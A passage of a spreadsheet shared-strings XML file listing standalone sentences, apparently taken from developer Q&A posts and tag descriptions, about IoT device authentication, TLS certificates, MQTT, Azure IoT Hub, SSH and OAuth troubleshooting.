-F "user=MYTOKENGOESHERETOO" \
-F "message=is online and connected.</t>
  </si>
  <si>
    <t>Please note, that you need to patch src/node.cc if you are using --without-ssl.</t>
  </si>
  <si>
    <t>Somehow I'm being flagged as a security risk every few days.</t>
  </si>
  <si>
    <t>It is digital data and it needs to be live on the website.</t>
  </si>
  <si>
    <t>this plugin uses http authentication instead of the file authentication.</t>
  </si>
  <si>
    <t>The unsecured MQTT connect works splendid and pushes data from a BMP180 to the cloud.</t>
  </si>
  <si>
    <t>However we can not get past an error message which tells us, that we have a key error in the authentification.</t>
  </si>
  <si>
    <t>Origin 'http://localhost:8080' is therefore not allowed access.</t>
  </si>
  <si>
    <t>I need to be able to bypass pin authentication, but if I could authenticate in some other way via only code, it would be a plus.</t>
  </si>
  <si>
    <t>Our firmware engineer guy is currently battling to get the HMAC part of the SAS token generation to work.</t>
  </si>
  <si>
    <t>So, using ssh user pi, I send my id_rsa.pub to 192.168.1.5 like this.</t>
  </si>
  <si>
    <t>The other thing is security, IoT Hub allows different shared access policy.</t>
  </si>
  <si>
    <t>I've been able to use this client which I can do basic gets however it doesn't appear to work with authentication.</t>
  </si>
  <si>
    <t>i need it to first connect to the modules IP and socket no 80 before sending the codes.</t>
  </si>
  <si>
    <t>I switched for my token and data ofc.</t>
  </si>
  <si>
    <t>My Cognito User Pool is the only authentication provider I have for my Identity Pool.</t>
  </si>
  <si>
    <t>I can only get message that device send but not the device ID.</t>
  </si>
  <si>
    <t>one that would be accepted by the OAuth2 service.</t>
  </si>
  <si>
    <t>i know its a certificate shared between server and client, but where do i get it?</t>
  </si>
  <si>
    <t>client handshake failed!</t>
  </si>
  <si>
    <t>And Everything is ok before token exchange.</t>
  </si>
  <si>
    <t>In my PCL project, I have a deviceClient that otherwise sends telemetry data.</t>
  </si>
  <si>
    <t>The wiring of part was triple checked.</t>
  </si>
  <si>
    <t>But the app is designed for the Unauthenticated user.</t>
  </si>
  <si>
    <t>The password field is used to transmit a JWT
        // to authorize the device.</t>
  </si>
  <si>
    <t>I was using the firebase-ui-auth with the previous version DP5.1 to login in on a Raspberry Pi, and it was working very well.</t>
  </si>
  <si>
    <t>The password field is used to transmit a JWT to authorize the device.</t>
  </si>
  <si>
    <t>How do I check if the client is connected or not?</t>
  </si>
  <si>
    <t>System.Security.Authentication.AuthenticationException: A call to SSPI failed, see inner exception.</t>
  </si>
  <si>
    <t>If I am looking into the contents of cipher_info it tells me it is using MBEDTLS_CIPHER_AES_128_ECB as mbedtls_cipher_type_t, instead of what I would have expected at first MBEDTLS_CIPHER_AES_128_GCM.</t>
  </si>
  <si>
    <t>Somehow it does not accept my shared access key.</t>
  </si>
  <si>
    <t>Bearer Token) management.</t>
  </si>
  <si>
    <t>Is Trusted Platform Module (TPM) the only way right now with edge device?</t>
  </si>
  <si>
    <t>Does the edgeHub module encrypt data received from the downstream devices?</t>
  </si>
  <si>
    <t>I know I must use (in the MqttClientOptionsBuilder)
but Im unsure how to specify which certifate to use to authenticate with
Any help would be appreciated</t>
  </si>
  <si>
    <t>It still comes back with 400 Unauthorized?</t>
  </si>
  <si>
    <t>origin 'http://localhost:8080' is therefore not allowed access.</t>
  </si>
  <si>
    <t>On Raspberry store.connect() throws a AuthenticationFailedException:
Why can't my Raspberry connect to host, but my PC can?</t>
  </si>
  <si>
    <t>How can I enable debug message logging for the AppManager?</t>
  </si>
  <si>
    <t>Does anyone know some simpler way to authenticate?</t>
  </si>
  <si>
    <t>ErrorCode:AuthenticationFailed
ErrorMessage:Server failed to authenticate the request.</t>
  </si>
  <si>
    <t>I have to register a device on IoT hub using DPS service.</t>
  </si>
  <si>
    <t>is there a way to know if the mqtt client is connected or not?</t>
  </si>
  <si>
    <t>When getting a connection request from the Linux peripheral it should display the passcode and connect to it.</t>
  </si>
  <si>
    <t>The first policy must be attached to an Amazon Cognito identity pool role.</t>
  </si>
  <si>
    <t>The Azure IoT-Hub blade on portal contains a certificate pane but this seems to be more related to clients certificates.</t>
  </si>
  <si>
    <t>Ran with DEBUG=*, saw
401 would be Unauthorized, but what is this "Custom allocation"?</t>
  </si>
  <si>
    <t>And I can then validate the request on the server?</t>
  </si>
  <si>
    <t xml:space="preserve">
Bluetooth is out because of Apple's scandalous policies in that regard 
You can use Bonjour for ad-hoc networking over Bluetooth.</t>
  </si>
  <si>
    <t>It will run as the web user (say, www for Apache), so that user will need to have appropriate permissions.</t>
  </si>
  <si>
    <t>Go from the part titled "SSH Keygen" to "SSH Permissions".</t>
  </si>
  <si>
    <t>then then command hostapd_cli deauthenticate 00:5e:3d:38:fe:ab can force the Client disconnect and will not connect again.</t>
  </si>
  <si>
    <t>The Client Characteristic Configuration descriptor is unique for each client.</t>
  </si>
  <si>
    <t>Error messages usually are logged there.</t>
  </si>
  <si>
    <t>It must also maintain a list of client MAC addresses that have authenticated.</t>
  </si>
  <si>
    <t>You'll be able to tell phonies from genuine request.</t>
  </si>
  <si>
    <t>You could let tomcat work without https and provide security using a tool like stunnel.</t>
  </si>
  <si>
    <t>As a consequence you can't register your callbacks on a socket but on the server itself.</t>
  </si>
  <si>
    <t xml:space="preserve">
 cannot be resolved because it's being accessed out of scope.</t>
  </si>
  <si>
    <t>Change your proxy_pass statement to either:
or (to use your upstream directive):
proxy_pass http://lobsters;</t>
  </si>
  <si>
    <t>Im not sure if you need the certs on lambda.</t>
  </si>
  <si>
    <t>When authenticating the user via password we use method ssh_userauth_password(ssh_session session, const char* username, const char* password).</t>
  </si>
  <si>
    <t>I had to provide the role the VPC access policy and it worked.</t>
  </si>
  <si>
    <t>Here is a code examle, requesting user to confirm that it's a human.</t>
  </si>
  <si>
    <t>Nominatim doesn't require an API key but you have to follow the Nominatim usage policy.</t>
  </si>
  <si>
    <t>The only way to use MQTT over websockets is to use a Cognito authenticated identity.</t>
  </si>
  <si>
    <t>What to remember is that you need also to copy the ssl certificates then of the gitlab server to the rpi.</t>
  </si>
  <si>
    <t>You are trying to connect to  unless you are running a broker on the ESP8266 this is never going to work.</t>
  </si>
  <si>
    <t>Yes, currently, Microsoft.Azure.Devices.Client.PCL only supported HTTPS protocol.</t>
  </si>
  <si>
    <t>You can't specify registration id in Azure portal.</t>
  </si>
  <si>
    <t>The Device SDK uses MQTT and x509 certificates to interact with AWS IoT.</t>
  </si>
  <si>
    <t>Chrome now allows Microphone access over secured Http only.</t>
  </si>
  <si>
    <t>Enable again the IR receiver after you send and IR message:</t>
  </si>
  <si>
    <t>In this way, it is not what the transparent gateway was designed.</t>
  </si>
  <si>
    <t>Probably a stupid remark, but is your TOKEN a valid Thingsboard device token?</t>
  </si>
  <si>
    <t>The policy below should be in the Cognito Auth and UnAuth roles.</t>
  </si>
  <si>
    <t>It would help to know what type of IoT authentication you're using.</t>
  </si>
  <si>
    <t>EdgeHub doesn't encrypt data received from downstream devices.</t>
  </si>
  <si>
    <t>For device the unique identifier from client side is HardwareId.</t>
  </si>
  <si>
    <t>This isn't quite how TLS certificate verification works.</t>
  </si>
  <si>
    <t>The possible responses of IoT Edge agent sent to IoT Hub</t>
  </si>
  <si>
    <t>You cannot use WiFiClient to connect to HTTPS.</t>
  </si>
  <si>
    <t>So any client connected before the channel hop will have to reconnect.</t>
  </si>
  <si>
    <t>BCrypt Encryption Library for .NET Platform</t>
  </si>
  <si>
    <t>A client-side library that implements the SSH2 protocol.</t>
  </si>
  <si>
    <t>Deobfuscator library for .NET assemblies</t>
  </si>
  <si>
    <t>LibreSSL is a version of the TLS/SSL protocol forked from OpenSSL.</t>
  </si>
  <si>
    <t>Transport security is available on iOS 9.0 or later, and on OS X 10.11 [tag:osx-elcapitan] and later.</t>
  </si>
  <si>
    <t>TLS: Transport layer Security: See IETF RFC 5246 http://tools.ietf.org/html/rfc5246</t>
  </si>
  <si>
    <t>SVNBridge is an extension for Microsoft's Team Foundation Server that allows the use of a Subversion client (e.g.</t>
  </si>
  <si>
    <t>GENERAL FIREWALL SUPPORT IS OFF-TOPIC.</t>
  </si>
  <si>
    <t>Eazfuscator.NET is an obfuscator for the .NET platform.</t>
  </si>
  <si>
    <t>StringTokenizer is a Java class that breaks a string into tokens.</t>
  </si>
  <si>
    <t>CMAC is a Cipher based Message Authentication Code.</t>
  </si>
  <si>
    <t>The attacker intercepts and retransmits messages such as the communication is still on.</t>
  </si>
  <si>
    <t>It is prominently used for tracing copyright infringements and for banknote authentication.</t>
  </si>
  <si>
    <t>Authenticate via username, email, or both
Registration
CSRF Protection
Their are plugin for this modules for work with Doctrine 2 &amp; Mongo DB ODM  
ZfcUserDoctrineORM - Doctrine2 ORM
ZfcUserDoctrineMongoODM - Doctrine2 MongoDB ODM</t>
  </si>
  <si>
    <t>The Symfony2 security component provides several layers to authorize users.</t>
  </si>
  <si>
    <t>SSL and S-HTTP are considered complementary "technologies".</t>
  </si>
  <si>
    <t>When the same user accesses another server in the same SSO domain, the user will not need to re-authenticate.</t>
  </si>
  <si>
    <t>For more information, see
ASP.NET Impersonation.</t>
  </si>
  <si>
    <t>Content can be distributed to users through redeemable codes.</t>
  </si>
  <si>
    <t>If you omit the title element, the document will not validate as HTML.</t>
  </si>
  <si>
    <t>Error codes are often provided in contexts where providing specific error messages would be costly, too varied, or redundant.</t>
  </si>
  <si>
    <t>It is also included with other SSH/SFTP clients, such as WinSCP.</t>
  </si>
  <si>
    <t>There are practical work-arounds for SPF and Sender ID users.</t>
  </si>
  <si>
    <t>It works with Amazon S3, Windows Live SkyDrive, Google Drive (Google Docs), Rackspace Cloud Files or WebDAV, SSH, FTP (and many more).</t>
  </si>
  <si>
    <t>Laravel includes a middleware that verifies the user of your application is authenticated.</t>
  </si>
  <si>
    <t>Use hidden code chunks, i.e.</t>
  </si>
  <si>
    <t>Focus on HTTP and not become a swissarmy knife of protocols.</t>
  </si>
  <si>
    <t>This strategy lets you authenticate using Freshbooks in your (for example, Node.js) applications.</t>
  </si>
  <si>
    <t>To use the Microsoft Bot Framework Connector, you must have:
A Microsoft Account (Hotmail, Live, Outlook.com) to log into the Bot Framework developer portal, which you will use to register your Bot.</t>
  </si>
  <si>
    <t>flex, an automatic lexical analyser, is often used with Bison, to tokenise input data and provide Bison with tokens.</t>
  </si>
  <si>
    <t>The untrusted Native Client application (nexe) undergoes static analysis by the SFI verifier before being allowed to run.</t>
  </si>
  <si>
    <t>Documentation:
https://msdn.microsoft.com/en-us/library/system.net.security.sslstream.aspx</t>
  </si>
  <si>
    <t>All API access has to be done over HTTPS, and accessed from the  domain.</t>
  </si>
  <si>
    <t>What can I use to replicate the Enter key?</t>
  </si>
  <si>
    <t>Do you have any information of a library that I can use to trigger HTTPS requests on Arduino Due?</t>
  </si>
  <si>
    <t>The requested URL /mydomain/admin/login was not found on this server.</t>
  </si>
  <si>
    <t>----Post on 2014/09/22-------------
I am trying to access the authenticated state of a Ntag213 with pn532.</t>
  </si>
  <si>
    <t>How is it possible to authenticate using Bluez 5.31 and GattTool?</t>
  </si>
  <si>
    <t>This python module is being used to connect a raspberry-pi2 to the hivemq broker but I am having problems with the authentication.</t>
  </si>
  <si>
    <t>I have got a Raspberry Pi with a Barcode Scanner attached to it.</t>
  </si>
  <si>
    <t>But when I try to run it as sudo, it throws an error: 
ImportError: No module named cv2
I'm guessing this has to do with permissions..</t>
  </si>
  <si>
    <t>The cause is obvious: the SSL certificate on the Pi has the FQDN in it and of course that is not the same as 192.168.2.13 or whatever.</t>
  </si>
  <si>
    <t>Or which is the better option to access the clients' information(ip, mac and rssi)?</t>
  </si>
  <si>
    <t>I confirm certificate and after that it shows Error 403-Forbidden.</t>
  </si>
  <si>
    <t>Is there any other pragma that could protect my application from this behaviour?</t>
  </si>
  <si>
    <t>Is it possible to do it, given that I don't have the user's device tokens with me?</t>
  </si>
  <si>
    <t>Is there any way to debug the internal messages?</t>
  </si>
  <si>
    <t>The IoT Hub
The DPS itself
I am trying to add a leaf certificate for the device.</t>
  </si>
  <si>
    <t>HTTPS protocol (CA issued cert) is being used.</t>
  </si>
  <si>
    <t>I have attached my code if anyone knows how to fix or circumvent the issue.</t>
  </si>
  <si>
    <t>As I know, the ssh_config is for the client and sshd_config for the server, so do I have to edit both files on both systems or what exactly could be the error?</t>
  </si>
  <si>
    <t>In C# application I am using SslStream to connect to ESP8266 but everytime I try to authentificate with the server it runs into error: "System.Net.InternalException".</t>
  </si>
  <si>
    <t>Firefox only likes them after adding an exception for that certificate.</t>
  </si>
  <si>
    <t>I use the iothub_ll_client_x509_sample (azure iot sdk c) in a own project.</t>
  </si>
  <si>
    <t>This method should return an Object 
 * with the username/password which will then be used to 
 * authenticate.</t>
  </si>
  <si>
    <t>From everywhere I got the token successfully.</t>
  </si>
  <si>
    <t>But I am still unable to get the token with my code.</t>
  </si>
  <si>
    <t>I have another user that connects to the Access server without the gateway settings.</t>
  </si>
  <si>
    <t>I am trying to enroll a Windows 10 device to my WSO2 IOT Server.</t>
  </si>
  <si>
    <t>I need to change the password when a user requests with new password in esp8266wifiserver.</t>
  </si>
  <si>
    <t>This create_jwt make token.</t>
  </si>
  <si>
    <t>What is the purpose of using intermediate certificate in device's code?</t>
  </si>
  <si>
    <t>Use the latest Intel IoT devkit image.</t>
  </si>
  <si>
    <t>It's hard to know without knowing a little more about your SSL certificate.</t>
  </si>
  <si>
    <t>You can use token pasting () to accomplish this.</t>
  </si>
  <si>
    <t>From: https://msdn.microsoft.com/en-us/library/ff369721.aspx
What do I do if my certificate has expired?</t>
  </si>
  <si>
    <t>Took some fiddling to get certs detached and able to be deleted.</t>
  </si>
  <si>
    <t>Here, We need to add client id along with the name of the certificate names, then only we can able to connect it.</t>
  </si>
  <si>
    <t>The problem seems to be with wso2iot-3.0.0 with posting the SAML login request.</t>
  </si>
  <si>
    <t>IOTHUB_CLIENT_CONNECTION_OK
Provided with status AUTHENTICATED.</t>
  </si>
  <si>
    <t>It could also be your token is getting messed up.</t>
  </si>
  <si>
    <t>You are using UTF16-Encoding with BOM, which most likely isn't correct.</t>
  </si>
  <si>
    <t>Once that password has been accepted, then the SSH command will run and then it will prompt for Pi's password.</t>
  </si>
  <si>
    <t>You can specify a unique user ID in the JSON request.</t>
  </si>
  <si>
    <t>You can find the Azure iot central firmware examples on github.</t>
  </si>
  <si>
    <t>clientIDs need to be unique for all client.</t>
  </si>
  <si>
    <t>You can use these certificates with Postman if you want, by adding them to the request under certificates tab (you only need the .crt and .key files).</t>
  </si>
  <si>
    <t>generate ssh keypair on client (each client should do these steps.</t>
  </si>
  <si>
    <t>Add the device certificate keys in the simulated application and run it.</t>
  </si>
  <si>
    <t>Although its not a right way to do this if there is multitenancy situation and you want to use intermediate certificate.</t>
  </si>
  <si>
    <t>Authenticating passwords.</t>
  </si>
  <si>
    <t>NTLM, plaintext, or certificate authentication
The security mode: transport mode (e.g.</t>
  </si>
  <si>
    <t>This method was deprecated in jquery v3.0
In ldap, 'bind' is a connect/authenticate step.</t>
  </si>
  <si>
    <t>The attacker may place some JavaScript code into this content.</t>
  </si>
  <si>
    <t>User will have an unique password to use the e-token, This inhibits others from using the e-token.</t>
  </si>
  <si>
    <t>Website: www.twilio.com/authy, www.authy.com
Documentation: docs.authy.com</t>
  </si>
  <si>
    <t>The project was born out of the belief that:
The network should be transparent to applications.</t>
  </si>
  <si>
    <t>The name of your public key is most certainly id_rsa.pub.</t>
  </si>
  <si>
    <t>What is the algorithm to decrypt the data payload ?</t>
  </si>
  <si>
    <t>Unfortunately I need to use CloudFormation to create the IoT Certificate.</t>
  </si>
  <si>
    <t>Survey the networks and create password for each network.</t>
  </si>
  <si>
    <t>* TO '&lt;username&gt;'@'&lt;ip_address&gt;' IDENTIFIED BY '&lt;password&gt;';
The parameters are those you used to create your user in the previous step
The * will grant access to all tables within the specified database.</t>
  </si>
  <si>
    <t>sudo mosquitto_pub -h "broker-URL" -p "Port" -t "topic" -u "user-name"-P "user-pass" -i "client-id"
Secondly credential, host, usenrname, password, and topic are all wrong (unless you "obscured" them before publishing to SO).</t>
  </si>
  <si>
    <t>When they do (which only occurs for illegally formatted spam messages) we think mime4j does a better job.</t>
  </si>
  <si>
    <t>The semantic of the format is:
Depending on your privileges you can access different levels of topics.</t>
  </si>
  <si>
    <t>To avoid this issue, and to make code simpler (dispense with all null checks on the client side), a special "token" object that represents a "null" is used in place of a null.</t>
  </si>
  <si>
    <t>I get strange encoded messages from my sim900 module when I enter AT commands.</t>
  </si>
  <si>
    <t>Once the token is valid, the application/user gets successful access to the protected service; otherwise, the access is denied.</t>
  </si>
  <si>
    <t>This kind of encoding would allow you to transmit the Raspberry Pi's location via an iBeacon at +/306 meters.</t>
  </si>
  <si>
    <t>I don't think you have access to a general file format except the above three types, otherwise you'll get an "Access is denied" exception.</t>
  </si>
  <si>
    <t>Viber syncs your contacts, messages and call history with your mobile device.</t>
  </si>
  <si>
    <t>Provided I handle device registration, SAS token handling etc.</t>
  </si>
  <si>
    <t>The error thrown is "error registering device: ProvisioningRegistrationFailedError: registration failed".</t>
  </si>
  <si>
    <t>The token is valid only in this time period.</t>
  </si>
  <si>
    <t>You'll need to get samples of them to verify but most checksums usually end up at 0.</t>
  </si>
  <si>
    <t>Facebook permissions are the different permissions that a web application can ask from a Facebook user, to access user data,  user's friends' data, and also to take actions on behalf of the user.</t>
  </si>
  <si>
    <t>We confirmed we could use TLS 1.2 in this way, but it fails to connect to IoTP because SSL certificate request doesnt come from IoTP.</t>
  </si>
  <si>
    <t>Here is the server:
Here is the client:
Added Internet permission of course.</t>
  </si>
  <si>
    <t>The authentication is also handled through Amplify (and yes, the user is successfully authenticated).</t>
  </si>
  <si>
    <t>Someone provided me with a intermediate certificate (signed by a root cert) and its password.</t>
  </si>
  <si>
    <t>We developed IOT based devices which connects to Watson IOT Platform ; we intend to use SSL Certificates.</t>
  </si>
  <si>
    <t>If I go up a level and then run, for example, publish/Application, it fails with the authentication error.</t>
  </si>
  <si>
    <t>The reason why it works in your browser is that it may have already been authenticated.</t>
  </si>
  <si>
    <t>According to the bug, latest Oracle VMs does not trust the certificates.</t>
  </si>
  <si>
    <t>Needless to say, I started running into the 401 UNAUTHORIZED failures like everyone else.</t>
  </si>
  <si>
    <t>And I would suggest that you use IoT Edge as an identity or protocol translation Gateway:
https://docs.microsoft.com/en-us/azure/iot-edge/iot-edge-as-gateway
"Gateways in IoT solutions provide device connectivity and edge analytics to IoT devices that otherwise wouldn't have those capabilities.</t>
  </si>
  <si>
    <t>However, the actual upload does not go through the Edge Device.</t>
  </si>
  <si>
    <t>The setcookie function sends an HTTP cookie to a client.</t>
  </si>
  <si>
    <t>It gives an attacker the opportunity to steal authenticated sessions.</t>
  </si>
  <si>
    <t>Command line SSL certificate request tool for Windows</t>
  </si>
  <si>
    <t>Improved safe_mode/open_basedir checks inside the cURL extension.</t>
  </si>
  <si>
    <t>Safari for Windows has been discontinued in 2012, with the latest version being 5.1.7 (534.57.2) released on May 9, 2012.</t>
  </si>
  <si>
    <t>The sensor is wired as described on page 10 of the datasheet, but XCLR and EOC are not connected.</t>
  </si>
  <si>
    <t>I have a Twitter App setup and I have the keys and tokens.</t>
  </si>
  <si>
    <t>When i ping 127.0.0.1, i get responses, but i can't ssh at that address.</t>
  </si>
  <si>
    <t>I can connect to the RPI using SSH but I can't attach a screen at the moment, because I don't have one.</t>
  </si>
  <si>
    <t>The value 0 means that the
  pasted image is completely transparent.</t>
  </si>
  <si>
    <t>No matter what I try to change I end up with this error message: No JSON object could be decoded.</t>
  </si>
  <si>
    <t>Connection String, Authorization Token.</t>
  </si>
  <si>
    <t>However, is it possible for an ESP8266 client to login to an enterprise network?</t>
  </si>
  <si>
    <t>What will happen when the temporary PFX certificate expire?</t>
  </si>
  <si>
    <t>I am wondering how can I stream that data into my computer from the pi using SSH.</t>
  </si>
  <si>
    <t>To convey any message to the device, from internet, I need to identify the particular device.</t>
  </si>
  <si>
    <t>The Raspberry Pi has a USB barcode scanner attached for the input.</t>
  </si>
  <si>
    <t>Here is the error message:
But the class "javax/crypto/spec/SecretKeySpec" is belong to jce.jar ( existed in java JDK).</t>
  </si>
  <si>
    <t>contains:
The key-file has been reproduced with openSSL, So it wouldn't be password-protected.</t>
  </si>
  <si>
    <t>So far I've used:
requests
twill
mechanize
robobrowser
I've noticed that the zwave goes through 'app/views/auth/auth_login.html' to log you in, but I just can't seem to get it.</t>
  </si>
  <si>
    <t>When I try to connect this in a secure mode, I get the socket error as below.</t>
  </si>
  <si>
    <t>Because of security reasons I do not want to send device ID in message itself.</t>
  </si>
  <si>
    <t>[date time, 805] [Iot - Core] WARN - FileSystemPreferences Couldn't Flush system prefs: java.util.prefs.BackingStoreException: Couldn't get file lock.</t>
  </si>
  <si>
    <t>I will be securing the connection
  between the application and cloud using JSON Web Tokens.</t>
  </si>
  <si>
    <t>When I run the the 'PubSub' sample application with Unauthenticated role, it worked as expected.</t>
  </si>
  <si>
    <t>Can I use this to connect to a secure MQTT broker (using port 8883)?</t>
  </si>
  <si>
    <t>But when I tried to use azure IotHub SDK C for my device, it seems that I should pass activemq username and password .</t>
  </si>
  <si>
    <t>Why is not client connect to server when I add sensor codes?</t>
  </si>
  <si>
    <t>I understand I can set up ssh keys to circumvent this issue, but I'd rather use https as it's, as far as I know, more secure.</t>
  </si>
  <si>
    <t>All seems to work well, but when I login into https://IP:9443/devicemgr, I got the message bellow :
Has someone experienced the same problem ?</t>
  </si>
  <si>
    <t>But there is no AT commands to force a client to disconnect by deAuth or through any other mode.</t>
  </si>
  <si>
    <t>I have not tried using the software simulated TPM on the MBM because I want this to actually be secure.</t>
  </si>
  <si>
    <t>The message is stored according to the key.</t>
  </si>
  <si>
    <t>I've confirmed in the IoT Hub that nothing has successfully connected for my IoT Device.</t>
  </si>
  <si>
    <t>I am using the codes from the site (https://www.hackster.io/dotMorten/windowsiottouch-44af19)
 to display my touchscreen.</t>
  </si>
  <si>
    <t>Then after my verification message is output (Got it!</t>
  </si>
  <si>
    <t>But there are no issues with the certificate when visiting the url with my browser (tried IE, Edge and FireFox).</t>
  </si>
  <si>
    <t>I attempted to install an SSL certificate for a site using certbot.</t>
  </si>
  <si>
    <t>I think that it can not possible, because device token value can not check IBM Cloud Dashboard.</t>
  </si>
  <si>
    <t>I entered the token in the define CLIENT_REGISTRATION_ID.</t>
  </si>
  <si>
    <t>Before disabling the serial consoles, I couldn't even connect to the device.</t>
  </si>
  <si>
    <t>I got a auth code from github and I'm trying to execute 'aircon_controlee' but it's working.</t>
  </si>
  <si>
    <t>2019-02-20 21:08:43:214 [D] authCode: 8f7174caa697d7914312
2019-02-20 21:08:43:214 [W] OAuth 3rd party library github does not exist.</t>
  </si>
  <si>
    <t>Transmitted only On/Off button codes to the client.</t>
  </si>
  <si>
    <t>no information about new delta messages are logged.</t>
  </si>
  <si>
    <t>This is based on x.509 cetificates (root+ intermediate certificate).</t>
  </si>
  <si>
    <t>It has some neat features, and above all, is runtime safe.</t>
  </si>
  <si>
    <t>Try applying percent-encoding to them.</t>
  </si>
  <si>
    <t>Secure Socket Shell (ssh) would be my suggestion.</t>
  </si>
  <si>
    <t>You could proxy the requests through a server that can speak SSL.</t>
  </si>
  <si>
    <t>In such cases I usually use a debug proxy to intercept the message.</t>
  </si>
  <si>
    <t>The only way to solve this is to let all the ordinary requests be proxied through the Raspberry Pi server as well.</t>
  </si>
  <si>
    <t>You're running into Socket security errors that are bypassed when you re using debug mode.</t>
  </si>
  <si>
    <t>If you want to have access from the internet, you should get an address from http://www.noip.</t>
  </si>
  <si>
    <t>Here is an example of implementing some edge detection.</t>
  </si>
  <si>
    <t>Also in windows it would try to authenticate to the remote server as the user which the process is running under.</t>
  </si>
  <si>
    <t>You want to follow server-side auth.</t>
  </si>
  <si>
    <t>The username must be use-token-auth and the password must be that provided after the device was registered.</t>
  </si>
  <si>
    <t>You may not be sending valid data to get a response.</t>
  </si>
  <si>
    <t>The IP address attached to interface eth0 can be viewed by .</t>
  </si>
  <si>
    <t>It can then validate the message and respond appropriately.</t>
  </si>
  <si>
    <t>Otherwise, if you use ping, at layer 3 you won't have access to the MAC address of the ping response.</t>
  </si>
  <si>
    <t>Looks like maybe you are passing the wrong token for authentication - I see some authentication errors in the Watson-IoT log.</t>
  </si>
  <si>
    <t>CREATE USER 'username'@'%' IDENTIFIED BY 'password';</t>
  </si>
  <si>
    <t>If you run from the root crontab, or from an init script, it will run as the root user, so it will have access to everything but will still need to know where to take the token from.</t>
  </si>
  <si>
    <t>I think it was more clear how to do it in the cloudant doc: 
https://console.ng.bluemix.net/docs/services/Cloudant/api/authentication.html#basic-authentication  then in the Watson IoT platform doc.</t>
  </si>
  <si>
    <t>MQTT broker in IoTS has an extension for authentication and authorization.</t>
  </si>
  <si>
    <t>As you know, wifi networks are protected to prevent unauthorized access.</t>
  </si>
  <si>
    <t>the part I liked was if you monitored your mqtt from a client like mqtt box or others.</t>
  </si>
  <si>
    <t>Another option would be to use another device as a protocol gateway.</t>
  </si>
  <si>
    <t>I used following link:
    https://www.installvirtual.com/enable-ssh-in-raspberry-pi-without-monitor/</t>
  </si>
  <si>
    <t>(it doesn't happen with AMQP that uses a different authentication mechanism).</t>
  </si>
  <si>
    <t>NOTE: Here are some unsafe code that may not be published to Store.</t>
  </si>
  <si>
    <t>The sounds generated afterwards have not had any further leaks.</t>
  </si>
  <si>
    <t>The user www-data is neither root nor in the gpio group.</t>
  </si>
  <si>
    <t>It could be because, you never reconnect if your client ever gets disconnected.</t>
  </si>
  <si>
    <t>It will also show the id of the device sending these messages.</t>
  </si>
  <si>
    <t>Use the interrupts and edge detection functionality provided by RPi.GPIO.</t>
  </si>
  <si>
    <t>This certificate is the one that Azure uses to secure the connection.</t>
  </si>
  <si>
    <t>This certificate is
  the one that Azure uses to secure the connection.</t>
  </si>
  <si>
    <t>For code sample you can reference "Sample code for x509 authenticated device" part in this reply.</t>
  </si>
  <si>
    <t>While this generally seems to solve the 401 UNAUTHORIZED errors, it is not a panacea!</t>
  </si>
  <si>
    <t>If so, you are most likely encounter a disconnect when your token is refreshed.</t>
  </si>
  <si>
    <t>Look at your Log, I found out that somehow my API Key was not accepted by Google (I cleared my Log so no snap!</t>
  </si>
  <si>
    <t>most certainty the certificates will stay expired and your device won't be able to reconnect.</t>
  </si>
  <si>
    <t>Ubuntu 18.04 uses sockets for authorization and not passwords!!</t>
  </si>
  <si>
    <t>You'll still need the JWT piece for the auth, but it would keep you from having to implement MQTT in the app.</t>
  </si>
  <si>
    <t>iOS 12.1.1 introduced Apple's new Certificate Transparency policy.</t>
  </si>
  <si>
    <t>The Azure IoT Central supports only Rules for Device Telemetry Data and Properties.</t>
  </si>
  <si>
    <t>More informations about TCP and TLS : https://medium.facilelogin.com/nuts-and-bolts-of-transport-layer-security-tls-2c5af298c4be</t>
  </si>
  <si>
    <t>The Firebase Arduino library has a reference to a fingerprint of the Firebase SSL certificate.</t>
  </si>
  <si>
    <t>He goes beyond SSL to establishing trust.</t>
  </si>
  <si>
    <t>Your security specialist should be able to allow Proof-of-Possession (PoP) for the intermediate CA.</t>
  </si>
  <si>
    <t>Also, you might want to consider sending CRC checksum at the end of the message to be safe.</t>
  </si>
  <si>
    <t>If you generate the certificates with a particular attribute then a condition in the policy can be used.</t>
  </si>
  <si>
    <t>https://firebase.google.com/docs/database/rest/auth</t>
  </si>
  <si>
    <t>As discussed above: the payload needs to be valid JSON.</t>
  </si>
  <si>
    <t>Includes options for data management and payment gateways.</t>
  </si>
  <si>
    <t>Security tokens are used to prove one's identity electronically.</t>
  </si>
  <si>
    <t>In iPhone development codesign deals with Provisioning Profiles, App Developer Certificate and device UDID.</t>
  </si>
  <si>
    <t>Log4Net's appender for logging to a database.</t>
  </si>
  <si>
    <t>SSLEngine is a Java 5.0 class which provides SSL/TLS services but is transport independent.</t>
  </si>
  <si>
    <t>HWIOAuthBundle adds support for authenticating users via OAuth in Symfony2.</t>
  </si>
  <si>
    <t>Kentor.AuthServices is a .NET library for SAML2 protocol support, adding SAML2 Service Provider functionality to ASP.NET applications.</t>
  </si>
  <si>
    <t>WhyML is also used as an intermediate language for the verification of C, Java or Ada programs</t>
  </si>
  <si>
    <t>Application-Layer Protocol Negotiation (ALPN) is a Transport Layer Security (TLS) extension for application layer protocol negotiation.</t>
  </si>
  <si>
    <t>MoneyBookers is the old name of the online payment system and gateway Skrill.</t>
  </si>
  <si>
    <t>Payfort is an online payment gateway.</t>
  </si>
  <si>
    <t>Every application has a single root scope.</t>
  </si>
  <si>
    <t>Passport strategies for authenticating with Google using OAuth 1.0a and OAuth 2.0.</t>
  </si>
  <si>
    <t>Cryptographic Message Syntax Standard</t>
  </si>
  <si>
    <t>Crypto Token Kit (CryptoTokenKit.framework).</t>
  </si>
  <si>
    <t>Google Allo is a secure messaging app from Google released for Android and iOS devices.</t>
  </si>
  <si>
    <t>Azure Active Directory Authentication Library for Java (adal4j)</t>
  </si>
  <si>
    <t>For issues relating to the .NET KeyNotFoundException.</t>
  </si>
  <si>
    <t>LAContext allows to request authentication from users through passphrases or biometrics.</t>
  </si>
  <si>
    <t>Proof Key for Code Exchange by OAuth Public Clients</t>
  </si>
  <si>
    <t>Deno is a secure TypeScript runtime built on V8.</t>
  </si>
  <si>
    <t>PKCS#7: Cryptographic Message Syntax Standard</t>
  </si>
  <si>
    <t>.NET Class for handling X.509 Certificates</t>
  </si>
  <si>
    <t>A property of immutable data is that it is *referentially transparent*.</t>
  </si>
  <si>
    <t>to dump the database contents to the attacker)</t>
  </si>
  <si>
    <t>IsInRole is a method of the WindowsPrincipal class found in the System.Security.Principal namespace of Microsoft's .NET framework.</t>
  </si>
  <si>
    <t>A Proxy server is a server acting on behalf of other servers.</t>
  </si>
  <si>
    <t>These know the token and language structure.</t>
  </si>
  <si>
